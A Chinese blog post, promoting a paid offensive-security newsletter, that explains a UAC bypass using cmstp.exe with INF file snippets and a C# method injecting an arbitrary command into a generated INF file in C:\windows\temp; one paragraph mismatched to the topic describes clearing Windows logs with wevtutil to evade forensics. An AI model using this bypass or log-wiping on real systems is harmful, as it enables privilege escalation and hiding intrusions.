.NET内网实战:调用CMSTP实现UAC绕过

最新推荐文章于 2025-06-28 14:57:40 发布
最新推荐文章于 2025-06-28 14:57:40 发布
阅读量1k 收藏 19
点赞数 20
CC 4.0 BY-SA版权
文章标签: .net windows 安全 .netcore web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/ahhacker86/article/details/144817775

01阅读须知

此文所节选自小报童《.NET 内网实战攻防》专栏,主要内容有.NET在各个内网渗透阶段与Windows系统交互的方式和技巧,对内网和后渗透感兴趣的朋友们可以订阅该电子报刊,解锁更多的报刊内容。

02基本介绍

本文内容部分节选自小报童《.NET 通过调用CMSTP进程实现UAC绕过》,完整的文章内容请加入小报童后订阅查看。现在限时只需59元,永久买断!目前已有280+位朋友抢先预定,我们会长期更新,对.NET内网安全的朋友们请尽快订阅该报刊!

03原理分析

在渗透测试或攻击活动中,清理日志是一项关键的操作,用于掩盖攻击者的行为,避免被防御者发现和追踪。通过 .NET 程序调用 wevtutil 命令,可以高效地清空所有的系统日志,这种方法具有较强的隐蔽性,能够绕过大部分传统的日志分析工具,为攻击者提供了一种强有力的反取证手段。

3.1 [version]

cmstp.exe的主要用途是帮助 IT 管理员或用户快速部署 VPN 配置或网络连接文件。一个合法的VPN配置信息一般包括网络配置、用户凭据、注册表修改、安装命令等内容。首先,我们看到配置文件中的头部version部分内容,具体如下所示.

[version]
Signature=$chicago$
AdvancedINF=2.5

此处的 Signature=$chicago$,是标准的 INF 文件签名,表示文件兼容 Windows.

3.2 [DefaultInstall]

在 CMSTP (Connection Manager Profile Installer) 的 INF 文件中,[DefaultInstall] 部分定义了安装过程中需要执行的主要任务。

[DefaultInstall]
CustomDestination=CustInstDestSectionAllUsers
RunPreSetupCommands=RunPreSetupCommandsSection

CustomDestination 参数 表示指向一个逻辑节点(Section),通常是涉及文件自定义的安装位置。

3.3 [AllUser_LDIDSection]

此处的 [AllUSer_LDIDSection] 定义了注册表的修改操作,将安装路径写入 HKLM 的 InstallPath 键中。

[AllUSer_LDIDSection]
"HKLM", "SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\CMMGR32.EXE", "ProfileInstallPath", "%UnexpectedError%", ""

此处配置的 CMMGR32.EXE 是 Windows 系统中的一个合法可执行文件,正常情况下通过cmstp.exe安装配置文件后,交由 CMMGR32.exe 加载执行。

3.4 编码实现

定义一个方法 SetInfFile,主要功能是动态随机生成一个 .inf 配置文件,并将指定的命令注入其中。

public static string SetInfFile(string CommandToExecute)
{
		string value = Path.GetRandomFileName().Split(new char[]
		{
			Convert.ToChar(".")
		})[0];
		string value2 = "C:\\windows\\temp";
		StringBuilder stringBuilder = new StringBuilder();
		stringBuilder.Append(value2);
		stringBuilder.Append("\\");
		stringBuilder.Append(value);
		stringBuilder.Append(".inf");
		StringBuilder stringBuilder2 = new StringBuilder(CMSTPBypass.InfData);
		stringBuilder2.Replace("REPLACE_COMMAND_LINE", CommandToExecute);
		File.WriteAllText(stringBuilder.ToString(), stringBuilder2.ToString());
		return stringBuilder.ToString();
}

生成的 *.inf 扩展名文件位于 C:\windows\temp\ 目录下,另外, 替换模板中的占位符 REPLACE_COMMAND_LINE 为传入的命令 CommandToExecute,比如,如果传入 cmd.exe /c calc.exe,运行如下图所示。

图片

综上,通过对 cmstp.exe 的深入剖析,我们可以看到,合法工具在特定条件下同样可能成为攻击链中的关键环节。利用其对自定义 INF 文件的支持,攻击者能够在不触发传统安全防护机制的情况下,执行任意命令或代码,从而实现绕过白名单和权限提升的目标。

04.NET 电子报刊

我们的小报童电子报刊【.NET内网安全攻防】也开始运营,引入小报童也是为了弥补知识星球对于轻量级阅读支持的不足,为用户读者提供更佳的阅读体验。如果您对阅读体验的需求比较高,那么可以订阅这个专栏。

本次电子报刊《.NET 内网安全攻防》专栏,内容主要有.NET在各个内网渗透阶段与Windows系统交互的方式和技巧,可细分为以下8个方向。

1) .NET 安全防御绕过
2) .NET 本地权限提升
3) .NET 内网信息收集
4) .NET 内网代理通道
5) .NET 内网横向移动
6) .NET 目标权限维持
7) .NET 数据传输外发
8) .NET 目标痕迹清理

原价899,现在限时只需59元,永久买断!目前已有280+位朋友抢先预定,我们会长期更新,初步计划保持每周更新1-2篇新内容,对.NET内网安全的朋友们请尽快订阅该报刊!

图片

 想要了解完整或者更多的内网安全方向的文章,可以移步订阅小报童《.NET 内网实战攻防》电子报刊,报刊地址:小报童 

Windows提权笔记-UAC绕过详解
墨痕诉清风的博客
03-12 612
用户帐户控制(UAC)是Microsoft在Windows Vista和Windows Server 2008中引入的访问控制系统。尽管UAC已经被讨论和调查了很长时间,但必须强调的是,微软并不认为它是一个安全边界。相反,UAC强制应用程序和任务在非管理帐户的上下文中运行,直到管理员授权提升的访问权限。它将阻止安装程序和未经授权的应用程序在没有管理帐户权限的情况下运行,并阻止对系统设置的更改。通常,UAC的效果是,任何希望执行具有潜在系统范围影响的操作的应用程序都不能默默地执行。至少在理论上是这样。
.NET内网实战:通过指定的COM接口执行命令绕过UAC
ahhacker86的专栏
11-08 1593
CMSTPLUA 是 Windows 系统的一个组件,专门用于在 CMSTP.exe 程序运行时管理用户权限请求,以管理员身份运行后,在 Registry 中打开 CLSIDs,输入 “cmstplua” 进行搜索,即可快速定位到该组件
使用CMSTP绕过AppLocker
prettyX的博客
07-10 438
0x01 AppLocker简介 0、在大型组织的安全领域中,AppLocker正在扮演越来越重要的角色,应用AppLocker规则可以显著降低企业的安全风险 1、AppLocker:即“应用程序控制策略”,是Windows 7系统中新增加的一项安全功能,在Windows 7以上的系统中都集成了该功能 2、利用AppLocker,管理员可以非常方便地进行配置,以实现管理用户在计算机上可以运行哪些程序、安装哪些文件、运行哪些脚本 3、由于AppLocker是基于组策略管理和配置的,因此,企业IT管理员
可以绕过 Windows UAC
langshanglibie的专栏
01-31 1916
Windows 系统安全机制并非固若金汤。通过 COM 提升名称方法,程序可以绕过其核心安全机制 UAC 而获取到系统管理员权限。
UAC学习之路
weixin_42282189的博客
12-31 777
作者: Crlt_TT豆 免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。 0x01 什么是uacUAC 用于允许管理员用户不对每个执行的进程授予管理员权限这是作为管理员UAC提升执行,如果成功完成,特权令牌用于创建进程。 这里为了区分低权限高权限的进程,微软使用了强制性完整性控制MIC MIC介绍 查看自己当前的完整性级别 whoami /groups 接下来我们以该级别创建一个文件 现在我们以管理员cmd给予test.txt最高的系统权限 可以看见我们对该文件是有.
ATT & CK 阶段之 Execution -- CMSTP
sojrs_sec的博客
05-09 1678
前言 ATT&CK 阶段之Executon即执行:当黑客入侵成功之后,往往会通过一系列的命令去获取信息、创建持续性会话。本文主要讲解通过cmstp.exe命令执行,调用恶意的dll或者com脚本(sct)。这种方式可以绕过applocker或者其他白名单的防御方式以及UAC. cmstp基本命令使用 cmstp.exe /s /ns C:\Users\ADMINI~W\AppData\Local\Temp\XKNqbpzl.txt 在cmd中执行cmstp.exe -h 安装配置 cmstp.e
.NET内网实战:通过winlogon、CMSTP提升本地账户权限
ahhacker86的专栏
02-13 872
此文所节选自小报童《.NET 内网实战攻防》专栏,主要内容有.NET在各个内网渗透阶段与Windows系统交互的方式和技巧,对内网和后渗透感兴趣的朋友们可以订阅该电子报刊,解锁更多的报刊内容。
.NET 一款通过COM接口绕过UAC的工具
ahhacker86的专栏
11-03 466
Sharp4COMBypassUAC.exe 是一款红队渗透工具,用于在 Windows 64位操作系统内网环境中绕过UAC,直接提升到管理员权限并启动一个新的高权限命令行窗口 cmd.exe
第八十七课:基于白名单Cmstp.exe执行payload第十六季.docx
09-15
2. **白名单绕过技术**:在白名单环境中,攻击者利用系统信任的Cmstp.exe来执行恶意代码,绕过安全策略。 3. **APT攻击与防御**:高级持续性威胁的特性,以及如何防御这类攻击。 4. **Metasploit框架**:用于生成和...
cmstp.exe.mui
01-04
cmstp.exe
基于PHP的自强者cmsTP5.0.22米家内容管理系统源码.zip
01-24
【标题】:“基于PHP的自强者cmsTP5.0.22米家内容管理系统源码” 这个标题揭示了我们正在讨论的是一个特定的开源CMS(内容管理系统),它基于PHP编程语言,并采用了ThinkPHP 5.0.22框架。自强者cms是一个用于构建...
渗透测试-基于白名单执行payload--Cmstp
weixin_30825199的博客
05-03 1154
0x01 Cmstp简介 Cmstp安装或删除“连接管理器”服务配置文件。如果不含可选参数的情况下使用,则 cmstp 会使用对应于操作系统和用户的权限的默认设置来安装服务配置文件。 微软官方文档: https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/cmstp 说明:Cmstp.e...
讓電腦不彈窗:UAC 用戶賬戶控制
m0_59952100的博客
10-15 376
UAC 用戶賬戶控制
突破UAC限制:UAC-Bypass-CMSTPLUA项目推荐
gitblog_00056的博客
06-03 460
突破UAC限制:UAC-Bypass-CMSTPLUA项目推荐 cmstplua-uac-bypass Cobalt Strike Beacon Object File for bypassing UAC via the CMSTPLUA COM interface. ...
UAC 实现原理及绕过方法
子曰小玖的博客
08-14 3528
0x00 UAC 工作流程 UAC 是微软在 Windows Vista 以后版本引入的一种安全机制, 通过 UAC,应用程序和任务可始终在非管理员帐户的安全上下文中运行,除非管理员特别授予管理员级别的系统访问权限。UAC 可以阻止未经授权的应用程序自动进行安装,并防止无意中更改系统设置。 https://msdn.microsoft.com/en-us/library/bb384608.aspx 从图上可以看到,如果要获取管理员权限,通过的路径有以下几条: 1,进程已经拥有管理权限控制; 2
利用CMSTP绕过AppLocker并执行代码
weixin_34403693的博客
05-23 246
CMSTP是与Microsoft连接管理器配置文件安装程序关联的二进制文件。它接受INF文件,这些文件可以通过恶意命令武器化,以脚本(SCT)和DLL的形式执行任意代码。它是位于以下两个Windows目录中的受信任的Microsoft二进制文件。 · C:\Windows\System32\cmstp.exe · C:\Windows\SysWOW64\...
使用cmstp绕过应用程序白名单
weixin_30237719的博客
03-08 298
默认情况下,AppLocker允许在文件夹中执行二进制文件,这是可以绕过它的主要原因。已经发现,这样的二进制文件可以很容易地用于绕过AppLocker和UAC。与Microsoft相关的二进制文件之一是CMSTPCMSTP welcomes INF文件,因此通过INF进行开发是可能的。因此,我们将学习如何进行此类开发。 众所周知,CMSTP接受SCT文件,然后无提示地运行,因此我们将创建...
麒麟系统使用-运用VSCode运行.NET工程
mystonelxj的博客
06-27 68
本文介绍了在麒麟系统中使用VSCode进行.NET开发的详细步骤。主要内容包括:1)通过命令行安装VSCode及必要扩展;2)配置环境变量设置dotnet路径;3)创建并配置launch.json和task.json文件;4)以控制台和网页工程为例,演示具体设置和运行过程。文章为开发者提供了在国产操作系统上使用VSCode进行.NET开发的环境搭建指南和调试方法,展现了该开发方案的可行性。
NLog、log4net、Serilog 和 Microsoft.Extensions.Logging 四大 .NET 日志库的综合对比
最新发布
Byronloong 的博客
06-28 539
以下是针对 NLog、log4net、Serilog 和 Microsoft.Extensions.Logging 四大 .NET 日志库的综合对比,从输出效率、易用性等角度展开
PHP自强者cmsTP5.0.22内容管理系统源码解析
- 提供了完善的中间件机制,方便实现安全、性能等需求。 - 支持命令行操作,便于进行项目管理和开发。 - 性能优化,支持opcode缓存、数据库查询缓存等。 - 集成了多种数据库访问抽象层,包括PDO、MySQL、MSSQL等...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

dot.Net安全矩阵

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值